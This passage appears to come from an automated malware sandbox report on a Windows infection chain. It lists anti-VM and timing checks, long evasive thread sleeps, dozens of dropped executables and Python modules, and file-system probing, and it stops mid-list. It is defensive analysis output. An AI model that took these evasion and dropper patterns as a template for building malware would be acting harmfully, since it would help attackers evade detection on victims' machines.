Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04AC0C8E rdtsc

0_2_04AC0C8E

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 417	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1775	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2006	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 725	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Window / User API: threadDelayed 8001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Window / User API: threadDelayed 1748	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 7610
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 2005
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9870
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9897
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Window / User API: threadDelayed 5761
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Window / User API: threadDelayed 3586
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Window / User API: threadDelayed 8979
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Window / User API: threadDelayed 892
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Window / User API: threadDelayed 8310
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Window / User API: threadDelayed 1565

Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\pywintypes310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\charset_normalizer\md.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015359001\f11f18202b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015361001\a4bd6a9bcb.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\win32trace.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015193001\K6UAlAU.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\H9TU4oY[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\ZiYbk6W[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015363001\5102d46fb9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\wOKhy9f[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015362001\432b30086e.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\win32api.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\win32ui.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015216001\wOKhy9f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\charset_normalizer\md__mypyc.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_pytransform.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\mfc140u.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015360001\3a4323f24d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015305001\94CwbGg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\pythoncom310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\python310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\K6UAlAU[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015366001\dce9e93496.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_win32sysloader.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_cffi_backend.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\94CwbGg[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

API coverage: 5.2 %

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8584	Thread sleep count: 51 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8584	Thread sleep time: -102051s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8560	Thread sleep count: 139 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8560	Thread sleep time: -278139s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8540	Thread sleep count: 417 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8540	Thread sleep time: -12510000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8572	Thread sleep count: 87 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8572	Thread sleep time: -174087s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8568	Thread sleep count: 82 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8568	Thread sleep time: -164082s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8568	Thread sleep count: 1775 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8568	Thread sleep time: -3551775s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8556	Thread sleep count: 2006 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8556	Thread sleep time: -4014006s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8572	Thread sleep count: 725 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8572	Thread sleep time: -1450725s >= -30000s	Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 11240	Thread sleep time: -8001000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 11240	Thread sleep time: -1748000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe TID: 4304	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe TID: 4304	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 6500	Thread sleep count: 136 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 6500	Thread sleep time: -136000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 4112	Thread sleep count: 5761 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 4112	Thread sleep time: -5761000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 4112	Thread sleep count: 3586 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 4112	Thread sleep time: -3586000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5804	Thread sleep count: 73 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5804	Thread sleep time: -73000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11876	Thread sleep count: 8979 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11876	Thread sleep time: -8979000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11876	Thread sleep count: 892 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11876	Thread sleep time: -892000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8520	Thread sleep count: 72 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8520	Thread sleep time: -72000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11848	Thread sleep count: 8310 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11848	Thread sleep time: -8310000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11848	Thread sleep count: 1565 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11848	Thread sleep time: -1565000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 12_2_00B57978 FindFirstFileW,FindFirstFileW,free,

12_2_00B57978

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 12_2_00B5881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,

12_2_00B5881C

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 12_2_00B5B5E0 GetSystemInfo,

12_2_00B5B5E0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Thread delayed: delay time: 30000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior

Source: axplong.exe, axplong.exe, 00000008.00000000.269464637148.0000000000820000.00000080.00000001.01000000.0000000A.sdmp, axplong.exe, 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: LoaderClient.exe, 0000002E.00000003.269803361016.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: explorer.exe, 00000023.00000002.269554816675.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\
Source: dwVrTdy.exe, 00000028.00000002.269664887145.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648294839.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269647087096.0000025635668000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\|
Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001257000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001257000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269672784820.000000000121C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000002.269554816675.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000002.269640823894.0000022432659000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000002.269640823894.0000022432605000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648294839.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269647087096.0000025635668000.00000004.00000020.00020000.00000000.sdmp, 